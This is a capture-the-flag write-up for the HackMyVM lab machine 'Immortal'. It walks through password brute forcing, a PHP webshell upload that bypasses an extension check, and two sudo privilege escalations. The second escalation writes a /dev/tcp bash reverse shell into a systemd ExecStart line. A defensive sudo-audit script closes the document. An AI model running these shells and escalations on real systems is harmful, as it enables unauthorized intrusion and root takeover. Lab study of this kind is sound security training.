Immortal - hackmyvm

Introduction

Machine name: Immortal
Difficulty: medium
Machine URL: https://hackmyvm.eu/machines/machine.php?vm=Immortal

Local environment

Hypervisor: VirtualBox

Target IP (Immortal): 192.168.56.106

Pivot host IP (Windows 10): 192.168.56.1 192.168.190.100

Attack box IP (Ubuntu 22.04): 192.168.190.30

Scanning

Zenmap's reliability really is hit-or-miss...

nmap -p 1-65535 -T4 -A -v 192.168.56.106/32


HTTP

A plain page.


A quick brute force with Burp Suite (BP) gives the password: santiago


Browsing through the files, the first find is the Morse code in important.txt


It decodes to NOTHIN7MPORTANT. Useful or not, keep it for now.

There are also several message.txt files; they are collected here:

I am very happy that you have included me in the project 
for the quest for immortality. I am sure we will succeed, whatever it takes. 
Best regards, Drake


Message to Eric.
Remember to buy mice for the experiments, there are very few left. Also remember to tell Boyras to give us the money he owes us, or else we'll have to beat it out of him ourselves.
Regards, David.

Message to all.
I'm glad you made it, I knew you would guess the password, it's the one we always used, although Boyras recommended us to stop using it because "it was in rockyou". 
By the way guys, you can still upload messages to the server from this new path -> upload_an_incredible_message.php
Saying goodbye very happy, David

This yields one key piece of information: the file upload path is /upload_an_incredible_message.php

File upload vulnerability

First, try uploading an arbitrary PHP webshell


There is some basic extension checking; renaming the file to a .phtml extension gets it uploaded successfully


Then it is just a matter of getting a reverse shell


(This is the first time I've seen a flag obtainable straight from the webshell...)


Privilege escalation

Does this even count as privilege escalation...

Anyway, the first thing to notice is a directory literally named ... under drake's home directory


www-data@Immortal:/home/drake/...$ cat pass.txt
cat pass.txt
netflix : drake123
amazon : 123drake
shelldred : shell123dred (f4ns0nly)
system : kevcjnsgii
bank : myfavouritebank
nintendo : 123456

Try each of these passwords in turn; the "system" one logs in over SSH as drake


Start with sudo -l, which shows one entry

Matching Defaults entries for drake on Immortal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User drake may run the following commands on Immortal:
    (eric) NOPASSWD: /usr/bin/python3 /opt/immortal.py

immortal.py here is actually writable by us... so there is nothing more to it: just write a shell spawn into it

drake@Immortal:/opt$ vi immortal.py
drake@Immortal:/opt$ cat immortal.py
import pty;pty.spawn("/bin/bash")
drake@Immortal:/opt$ sudo -u eric /usr/bin/python3 /opt/immortal.py
eric@Immortal:/opt$ id
uid=1002(eric) gid=1002(eric) groups=1002(eric)
eric@Immortal:/opt$

Escalation to eric succeeded

Privilege escalation via the service

Again, start with sudo -l

eric@Immortal:~$ sudo -l
Matching Defaults entries for eric on Immortal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User eric may run the following commands on Immortal:
    (root) NOPASSWD: sudoedit /etc/systemd/system/immortal.service
    (root) NOPASSWD: /usr/bin/systemctl start immortal.service
    (root) NOPASSWD: /usr/bin/systemctl stop immortal.service
    (root) NOPASSWD: /usr/bin/systemctl enable immortal.service
    (root) NOPASSWD: /usr/bin/systemctl disable immortal.service
    (root) NOPASSWD: /usr/bin/systemctl daemon-reload

Running the sudoedit entry shows that the contents of the service unit can be changed


So no need to be subtle here: put a reverse shell on ExecStart, then restart the service

ExecStart=bash -c "bash -i >& /dev/tcp/192.168.56.1/40001 0>&1"


Root obtained
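Both escalation steps above come from the same class of sudo misconfiguration: a rule that runs an interpreter on a script the caller can write, and a sudoedit rule on a systemd unit paired with permission to start it. The audit below is an added example, not part of the original writeup; it parses the two sudo -l listings quoted here (embedded as constructed samples) and flags those patterns. The is_writable callback is an assumption so the check can run without the target's filesystem (by default it uses os.access).

```python
import os
import re

# Constructed samples: the two "sudo -l" listings quoted in this writeup.
SUDO_L_DRAKE = """User drake may run the following commands on Immortal:
    (eric) NOPASSWD: /usr/bin/python3 /opt/immortal.py
"""
SUDO_L_ERIC = """User eric may run the following commands on Immortal:
    (root) NOPASSWD: sudoedit /etc/systemd/system/immortal.service
    (root) NOPASSWD: /usr/bin/systemctl start immortal.service
    (root) NOPASSWD: /usr/bin/systemctl daemon-reload
"""

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")
UNIT_DIRS = ("/etc/systemd/system/", "/lib/systemd/system/", "/usr/lib/systemd/system/")
INTERPRETERS = {"python", "python2", "python3", "perl", "sh", "bash", "ruby", "node"}

def parse_sudo_rules(text):
    """Return the per-command rules that follow the 'may run' header; earlier lines are skipped."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            rules.append({"runas": m["runas"], "nopasswd": "NOPASSWD:" in m["tags"],
                          "cmd": m["cmd"].strip()})
    return rules

def audit_rules(rules, is_writable=lambda p: os.access(p, os.W_OK)):
    """Flag rules whose practical effect is a shell as the run-as user."""
    # Pass 1: unit files the caller may rewrite via sudoedit (their ExecStart runs as root).
    editable_units = set()
    for r in rules:
        argv = r["cmd"].split()
        if os.path.basename(argv[0]) == "sudoedit":
            editable_units.update(os.path.basename(a) for a in argv[1:] if a.startswith(UNIT_DIRS))
    findings = []
    for r in rules:
        argv = r["cmd"].split()
        prog, runas = os.path.basename(argv[0]), r["runas"]
        if prog == "sudoedit" and any(a.startswith(UNIT_DIRS) for a in argv[1:]):
            findings.append(f"({runas}) {r['cmd']}: caller controls ExecStart of a root-run unit")
        elif prog in INTERPRETERS and len(argv) > 1 and is_writable(argv[1]):
            findings.append(f"({runas}) {r['cmd']}: script is writable by the caller")
        elif prog == "systemctl" and len(argv) > 2 and argv[1] in ("start", "restart", "enable") and argv[2] in editable_units:
            findings.append(f"({runas}) {r['cmd']}: starts a unit the caller can rewrite")
    return findings
```

On a real host, feed it the output of `sudo -l` for each account and leave is_writable at its default so the script check reflects actual permissions.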
